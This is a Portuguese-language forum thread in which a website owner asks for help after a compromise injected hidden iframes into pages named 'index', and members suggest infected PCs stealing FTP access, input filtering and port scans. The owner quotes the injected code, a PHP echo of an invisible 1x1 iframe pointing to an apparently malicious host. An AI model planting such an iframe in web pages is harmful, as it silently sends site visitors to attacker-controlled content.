Vulnerabilidade php final

[Derme 0]

Oi, tem uma postagem anterior minha que relato invasão no meu site, descobri que em algumas páginas foram inseridos iframes ocultos, que são o fruto do problema. Descobri também que só ataca arquivos que tenham a palavra index no nome, como index.htm, cabecalho_index.php etc

Á minha dúvida é: o administrador do provedor disse que provavelmente tem uma brecha de segurança no meu código php, porém tá atacando paginas em html puro!

o que gostaria de saber é se esse código pode ser inserido em uma página html fruto de uma bracha em outra página em php?

[~TiuTalk~ 7]

Sim, pode... Mas verifique se o seu computador (ou o computador de quem envia arquivos para o servidor) é seguro... A injeção de código pode acontecer durante o envio de dados pela porta 21 (FTP). ;)

[Derme 0]

É, mas já enviei de 2 computadores diferentes, seria muita coincidência!

[~TiuTalk~ 7]

Coincidencia não existe :P

[Marcio Leandro 0]

Se o site possui formulários, filtre os dados.

Tente verificar se houve o mesmo problema em sites hospedados no mesmo servidor: talvez o problema não esteja apenas nos seus scripts.

[Derme 0]

Em primeiro lugar desculpem a insistência nesse assunto. É que só agora, depois de ter um dos meus sites

invadido, que me dei conta que aínda sou muito deficiente nessa questão.

 

dei uma olhada nos links postado por Hinom no meu post anterior e percebi que mais ou menos o que acontece comigo

inclusive o endereço de um dos iframes gooogle...

 

Vou tentar ser o mais simples e direto, fazendo algumas perguntas, só pra resumir:

 

a) Eu posso ter um site com o código php sem nenhuma falha de segurança, e mesmo assim ele ser

invadido, por conta de falha do provedor?

 

B) Se eu concluo que a falha está no meu codigo, existe algum caminho mais ou menos padrão

que eu possa tomar para detectar onde está o trecho vulnerável?

 

c) A invasão só pode ocorrer via POST OU GET? se eu usar por exemplo "strip_tags" para todas

as entradas impediria que fosse gravado qualquer tipo de tag por terceiros, ou isso aínda poderia

acontecer? tem um detalhe sobre isso, vou descrever abaixo.

 

Eu percebi que só foram invadidas páginas que possuem "index" no nome, o código inserido é um iframe oculto aí abaixo

 

echo "<iframe src=\"http://vafuiek.com/?click=652C5\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"

Porém existe apenas uma página index que não foi invadida, é um sistema de banner que comercializo

no meu site, e nesse eu uso uma função desenvolvida por mim que capta automáticamente qualquer

envio via "POST" ou "GET", analisa e se tiver algum termo definido por mim como proibido, impede o

envio, mas também eu não defini nem "iframe" nem "echo" como proibidos e não teria porque, pelo meu

script de proteção, que tal código não fosse inserido com eficiência, mas como foi a única diferênca visível

que encontrei com relação as outras páginas "index" que eu não uso esse script, e foram atacadas, então estou relatando o fato.

Esse script facilita porque você não precisa ficar tratando entrada por entrada é só colocar um

include no topo de cada página e pronto; ele é eficiente no que se propõe, mas até que ponto protege aí eu não sei.

 

Você pode baixar esse script no meu site http://www.colmeiaweb.com no menu "Scripts Gratuitos" no link "PHP Scripts" o script de nome "Proibe Script".

 

OBS: Todos os sistemas que comercializo usa esse script de proteção e atá agora

não recebi nenhuma queixa de clientes sobre ataques, mesmo os que estão no mesmo

provedor, não sei se realmente poderia ser ele, mas alguém com mais experiência em proteção poderia analisar e dar um parecer.

 

Agradeço a paciência.

[Will Fernando 2]

assim .. eu penso pelomenos que o cracker(*acho q escrevi errado xP) tem que te mais conhecimentos na area que o desenvolvedor para poder explorar as vulnerabilidades da aplicacao.. entao o negocio eh ta sempre ae nos forum e lendo livros ... estudando.. manter-se atualizado... cada dia surge novos metodos e bugs para serem explorados .. e a medida q vao sendo descobertos o desenvolvedor tem que ir achando metodos de evita-los...

 

um bom lugar para buscar estas informações eh no imasters .. tem noticia fresquinha todo dia .. alem dos artigos escritos por profissionais experientes na area como o Alexandre Freire entre outros ...

 

valww espero ter ajudado

[Marcio Leandro 0]

Por favor, este já é o terceiro tópico que você cria sobre a mesma questão. Desenvolva ele até resolver tudo, você nem chegou a comentar meu post no tópico anterior.

Os tópicos foram mesclados.

[Derme 0]

Desculpe, você tem razão, é que esse problema está me deixando muito preocupado.

 

>> Se o site possui formulários, filtre os dados.

>> Tente verificar se houve o mesmo problema em sites hospedados no mesmo servidor: talvez o problema não esteja apenas nos seus scripts.

 

É, pode ser que não esteja fazendo isso direito, mas como disse mais acima, tem um arquivo que não foi infectado, justamente o que eu uso uma função, que verifica

qualquer entrada POST ou GET e proibe termos definidos por mim, então se você tentar num formulário ou em um link passar a palavra "exec", "die", "sql" e outras mais, ele impede. Pode não ser o meu script que impediu isso, mas foi o único arquivo não infectado (como já mencionei só infecta arquivos que possui a palavra index no nome!)

[Marcio Leandro 0]

Verifique quais portas estão abertas no servidor. Você pode fazer um teste de portas com o NMap.

Exitem programas que exploram falhas conhecidas de sistemas operacionais desatualizados.

QUal sistema está utilizando ?

Conhecendo-se as portas e o sistema operacional, dá pra se ter uma idéia mais sólida do ambiente que foi atacado.

[hinom 5]

São vários pontos para analisar.

Esse tipo de problema que você está tendo, é bastante comum e antigo

A primeira vez que vi foi em 1999.

De tempos em tempos eles surgem. Na maioria dos casos espalham-se por cracks de programas diversos.

Coincidencia ou não, desde abril de 2009 vem aumentando casos idênticos ao seu, inclusive existem 2 ou 3 tópicos recentes relatando algo semelhante. No caso deles foi detectado virus no PC.

A maioria dos usuarios que pegam virus são usuarios que executam cracks para burlar a licensa de uso de algum software.

 

Por isso, sugiro que procure por malwares no seu pc, independente de ter software pirata ou nao. E também, não confie 100% em anti-virus, anti-spy etc.. pois detectam somente programas conhecidos.

 

 

ps: poste os scripts maliciosos que encontrou nos seus arquivos "index"

 

geralmente é algo estranho codificado em base64 com uso de eval() e umas coisas estranhas.

com base no código é possível identificar mais rapidamente e um simples busca no google pode resover.

[Derme 0]

Eu só identifiquei o iframe que é inserido, e postei acima, você acredita então que existe um código em alguma página minha que causa isso?

 

O que eu sei é que envio as páginas limpas e elas não são infectadas imediatamente, leva algum tempo.

Outra coisa, eu enviei ja de três maquinas diferentes uma inclusive nunca tinha sido usada para tal fim.

 

minhas páginas são criptografadas com o soft sourcecop, mas uso em diversos sistemas, inclusive instalados nesse mesmo servidor

e nunca deram problemas, na verdade facilitam que eu veja os iframes maliciosos pois aparece abaixo do código criptografado,

 

eu limpei e reenviei os arquivos infectados, em um desses tópicos um usuário disse que setou as permissões para 444 e não mais deu problema, foi o que eu fiz pra ver o que acontece, sei que não é o ideal, porque não estaria de fato resolvendo o problema, mas preciso pelo menos de uma solução provisória.

 

Agora tem uma outra coisa estranha que tá acontecendo, eu não tô conseguindo enviar a pasta admin, não consegui também criar uma pasta diretamente no servidor com o nome admin diz que já existe, e ai eu consigo visualiza-la momentaneamente, tento abrir e da erro, depois ela desaparece, será

que pode ter algo haver com o problema do virús? já tentei de duas maquinas diferentes e não consegui.

[hinom 5]

1. envie esses mesmos arquivos para um server diferente e veja se ocorre o mesmo. se acontecer o mesmo 98% de chances de ser virus nos seus pcs